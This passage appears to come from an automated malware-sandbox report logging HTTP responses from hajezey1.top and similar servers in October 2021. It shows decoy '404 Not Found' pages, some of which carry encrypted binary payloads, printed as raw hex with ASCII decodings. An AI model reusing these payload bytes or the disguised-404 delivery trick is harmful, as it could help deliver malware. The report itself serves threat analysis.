3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 42 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 76 92 71 06 45 a6 3e 11 dc a4 a3 a6 7e d8 6c a2 05 09 17 f6 cb ee 72 76 25 3f 50 19 01 bf 01 ea 53 01 b3 15 20 f5 3b e2 2a c2 d5 71 18 46 9b 3d f9 5c 40 8f ba f1 80 fe 05 b5 79 9e 10 b0 fb 14 9e 76 e9 bb 27 58 a4 0c 87 05 f0 bf 5f 60 08 d9 eb a8 e1 48 a8 03 88 31 7c 3b 66 ab 4b 11 c0 4d 08 0e 77 13 9e 09 5f 47 0b 5d 16 75 32 39 c5 f7 15 67 aa cf d0 c0 78 9e 0d a3 75 c1 96 52 88 36 19 ff bd 88 13 d8 06 0e 25 4f 12 7d 6f ed e0 04 89 19 d7 57 80 90 30 89 ec f4 4a 6b b6 f0 a2 22 4d 32 d3 49 ad ff bc ff 1a fd f4 3f f4 6f d3 7c cb c6 a8 cc 4e 4d b3 0b 97 2a 60 55 59 ad 30 fb 83 3b 3b ca c3 f3 b2 ec 92 90 1f 1c 57 fe 87 7e 0c 35 8a 3d 40 7f d0 56 81 96 9b 97 9e 70 9f 8a a2 25 44 5a c9 b2 cb 99 64 21 68 85 d2 f8 b8 56 b0 40 f6 0a bf 8b 71 91 e0 55 d0 66 21 df 76 79 27 e4 21 94 42 22 d1 3a 0d b4 43 06 1e 27 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 f0 d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 91 3d 4b 04 78 2d 7f 14 2c d6 e8 b1 14 73 71 10 22 07 4a 86 97 31 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 70 9c 82 97 d1 d6 4a 13 a7 e9 4d 51 c2 41 64 e3 53 39 f5 c3 a3 23 0c 28 df 52 d2 eb f9 23 19 9d 8c 3f 70 36 45 ae e4 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 f8 62 47 22 0b 85 d4 ca 55 56 9b 46 76 1d f3 13 02 63 34 42 c2 0c ce ae 70 85 96 36 e2 48 50 67 74 50 b8 87 f6 bc 81 de fb 6e 6a f6 e1 7b 54 3c 81 d2 be 95 df e2 63 10 ec 88 c0 5d 14 66 f2 e6 2f 59 47 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 65 f5 b8 90 c4 f7 07 26 67 1e 54 7a 54 4f 38 c0 5e 33 25 1b 6e 47 94 be 07 13 de 9a 3e 05 22 7d e6 b2 68 60 b9 10 31 eb 8d fc 25 57 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af dd c6 83 41 67 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5d Data Ascii: =]
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:02 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 37 33 33 0d 0a b8 00 00 00 c7 1a b3 fa 05 54 a4 5f 28 1e c5 73 c8 bb 6f 2d ae 22 c0 a9 8f 89 bd 2a 1c 21 f8 64 eb 16 a1 85 cc be 11 ce 58 26 9a 05 1e 5c c6 c1 69 3a 30 5b 9b c4 28 c2 ef 63 ab b5 4a e8 89 6e 9c 3d f7 c6 fe 06 43 1d 42 b0 fa b9 17 9d bc 30 e1 7d b4 71 0c f3 55 ca a6 9d 45 22 ea 9d de 0a 6c 39 20 12 7c 4b 07 4c f2 97 87 24 3a c2 ff e2 61 c9 ff 82 3e 8d 64 f6 2c 24 84 19 bd fa 7b 18 4f ce fd ab 1c f3 bb 9d 70 2b 2b eb ec 0b b0 37 d1 d7 3d 24 bb 29 51 24 7c 4e e0 35 9d 11 e0 42 10 5e 4d 2f 68 41 22 93 01 8f 26 1e 4b e8 70 6a ed 03 43 fd b3 0a b8 09 cd 31 c3 31 00 76 26 05 00 99 e1 70 64 01 08 02 00 05 00 9c 03 00 00 8f 53 a0 cd 6b ff f3 42 ef be 5f a6 0b 12 1e 00 fa 2d 5f bc 60 48 43 c4 3f a0 d1 42 cb fe 22 d0 1e 94 d6 c5 1a 29 6e 08 cd c8 2d c7 4d 7e 61 df 49 1a 97 84 14 51 2c 4c e4 c5 d6 02 94 b8 c5 49 53 0d 5e 82 e6 83 ab 8e 62 c5 9d 46 0b a0 aa 3e c7 fd d6 bc a4 ad e8 3c 50 ba e0 3c fe e9 66 4d 4e a6 6b ea 3a 3d ce 29 2a 37 e9 6c 89 d6 f5 15 31 cc 37 72 61 7e 22 b0 24 77 36 7c 4e 6b 9a aa 32 ae ff ad 7d d1 69 71 5e 52 c5 cc 89 d6 bb fa 1e 30 d1 95 9d 4c 69 ee fe ef 04 01 d8 3e 1b 87 e4 46 c1 6e fb 21 19 c0 a0 dd 94 37 60 40 b8 71 82 cf 26 ba ba 93 8d d0 d2 c2 59 ae 5a 2b f1 dd f6 78 90 66 b1 4e ca f3 88 94 76 73 aa 67 95 39 13 f9 1a 7e db 59 b0 5a be ea a7 57 2c da 41 2f 3b 44 99 a6 d1 e3 ae 5d 44 1c 04 12 87 6b 36 97 f0 39 ba 17 30 82 22 5d 97 9c 25 f8 0f 01 a5 f3 47 51 4b c6 6c ab e9 ee 5b 16 36 f0 62 25 02 ed 05 a6 10 4e c2 e6 19 fe 62 4e c5 5b d6 25 26 c8 0b 8d ec 99 23 41 05 8c 38 bb 0c c3 e8 42 32 14 41 b7 83 9c af 9a 27 3e 5a 59 7c a3 5e ee 1c 9c 12 fc 53 8b e3 c9 3c 9d f9 b6 c4 e6 9f 86 54 45 f9 ea dc e7 d2 62 dd f4 b6 fc 61 49 d6 3d 2d fb 53 9e df 18 af 5e 30 3d 56 2a 0f 38 20 a4 
0d c3 98 c2 87 1d fd 7b 76 27 90 ad 0d f8 1c 82 12 74 be 06 e5 be c0 91 3d 8d d9 76 35 3a 86 ce 8b 57 89 6b 9e 6b 94 4b fe 6e 7b 84 16 f5 b4 5c b4 8f df 2a 68 2b 33 43 0b 6e 60 35 e6 3b 93 c5 fd e6 62 80 69 e2 92 79 02 9e 47 77 90 92 90 52 4f cf 29 e7 8b 19 b7 16 d5 1a 92 65 37 c9 26 3c 17 27 bd 55 08 ce c3 07 7a 53 f1 6f 43 0a 86 a0 32 60 f8 0d f1 24 e9 e4 c0 fb cd ae cb cb 6c 00 9c ef 2f 87 07 95 d6 a2 32 a9 f4 6b d7 2c e8 2c 27 c2 b7 00 ef 75 ec d5 58 86 2a ad a4 97 43 9a 52 8f 28 e9 1b ce e1 d3 d0 78 92 a0 ab 1e e0 dd 3d cc e0 5a 14 90 1d 7d 10 44 b2 b1 04 a8 db 37 c3 a1 bb 3b 1c f8 3e 56 ed 73 dd 7d b0 6b 95 36 fd 00 c5 00 b0 6f 9b 2b 71 fb 79 82 a6 e1 23 c2 b9 8a a8 89 62 ba 2d 12 c6 52 d3 b1 97 b5 64 20 e9 05 e7 b4 dd e7 89 3a 3b a5 25 ec 86 96 39 8e 21 04 ab 93 4a ec 81 e7 55 81 50 94 e0 5b 5b 40 17 8f ac 1e 17 68 a5 e6 f4 09 11 8f 34 77 8f dc 57 87 c9 7d d9 e7 6b 23 6c 4e d0 db 94 61 ae f2 5c 36 c5 15 c9 a7 a3 39 4b 2b 05 81 e2 8b cf fa 08 90 e8 55 0c 8b 78 14 91 04 c2 44 ed b6 c6 17 7c 82 6c 40 c6 ec b6 91 3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:03 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=99Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 39 33 38 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 1d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 85 a5 24 d1 ee 12 d7 a8 78 27 4c 76 46 ea d6 2c 43 64 1b 67 c4 62 1c 74 29 44 86 43 af 6f a0 68 8a 59 6d 82 4a a7 cf 1f c6 a3 13 69 4a 24 b3 ea 27 63 13 57 70 50 68 6a 3e e0 2f 7a 70 79 23 e3 d8 2f 09 13 72 9b be 7c 42 bf 19 de 6c dc 13 55 70 53 0a 46 17 7c e7 ba 3f dc 9e 2e c9 81 e8 ce 05 4c c4 c1 52 3a 54 6b ad 87 f9 07 87 d6 41 c9 b0 26 1c 94 30 99 7f 5b 92 2a 93 5b af a8 98 7a bd 0b e2 a4 22 3e 1a 20 cc cc b6 ca 21 af ad f5 31 a1 a3 cf 37 1f 5a eb 3f 5c c5 74 59 90 8f f5 06 b6 0e cd 9a df a5 61 69 fd 70 12 70 df ce 22 db e0 ab ab b6 2e 08 8f ff dd 4c 76 20 e1 ff 38 5c 3f 0f 83 d0 20 38 ba 60 bd 59 22 09 79 53 40 98 e3 94 54 f0 2f 60 43 8c 47 f0 86 f8 fb 34 6c 1f f1 69 d5 92 4e 76 8c 96 bd 4a 16 e9 37 a2 55 6b 5f c7 ae 4a 88 54 d9 4e 3d b6 7b 93 fe 88 2c 93 7e 87 12 75 d7 9a db 05 a9 46 75 18 c7 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 69 4f 44 88 fe 40 0a 5c 69 ba e8 33 74 16 00 89 12 1e 0d 63 bb 9c d4 46 d1 64 3b df d5 af 2b 02 57 d3 db 53 3d a0 c3 96 8b 7d 64 17 9a f7 3e c2 56 75 1b e2 95 15 f7 bb 2e 64 35 e2 26 2c 74 a4 34 54 05 91 5f ef 6c 05 23 8f f5 4a b0 de 7f 0d 6a f3 d8 90 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 92 d6 ea 8c 11 7d 72 d7 6a ab c1 39 e2 23 13 96 c4 66 d1 30 80 06 10 b2 9c 78 c6 58 43 f6 e7 2a 92 72 08 aa 14 21 52 ff f3 53 5d b5 78 3d f1 24 a0 e9 37 7f 3b 60 ff f1 ee 71 c0 b6 4f 4d bb 
75 4b 53 06 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 d3 03 e8 e9 32 2c 0d 90 db 4f f4 47 d3 1c 4c 93 19 c0 0d 04 7d 76 88 52 8c 2a 01 6e fe ca 39 52 41 cc 35 5f 27 89 98 4c 28 48 94 14 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 a1 95 87 04 7d 32 7d 42 02 42 39 ad d5 d3 3c 86 63 55 cd b7 fb 29 6d da 0a 1e d7 09 07 99 cb 23 5b c4 b5 b5 5f 7c a9 84 79 89 b1 39 ec 06 88 45 fa e6 58 a9 e6 e8 4f 67 2c 5e db 50 c7 95 e6 d8 99 0a e2 4c c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 76 ed f6 4b a5 53 52 d2 c5 d4 d1 79 5e 67 ad 6d 11 b0 c0 db 31 a0 29 77 31 ac b2 03 07 1e 17 76 28 bc db 58 67 4b 5b 67 c2 3f d3 78 d9 f8 1f ba e2 50 11 3b ec 5f e0 3c c7 4b d4 50 b0 20 e1 1e 34 ef d3 2e ac 9c d8 f7 0d c2 23 af 38 15 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 6c 1c 9d 89 05 4d 99 2e b4 58 13 86 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 4d 9c 94 1b 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 a6 4d c5 03 97 65 a3 61 7e de f5 36 9c 19 17 7e 4f af 9a a5 84 cb a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 31 70 48 9a 07 fd ec 3f 36 7f ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 c5 52 ce 4f 13 79 82 ae 9c f7 ad 4e 3d 79 ac f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 10 d3 fb 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 02 ed fd 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 44 40 40 07 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 40 22 b5 1b 6f d3 cb 29 32 86 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 5f a0 1f e4 a6 bd 12 9f 10 ff d9 b0 99 b5 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb d1 
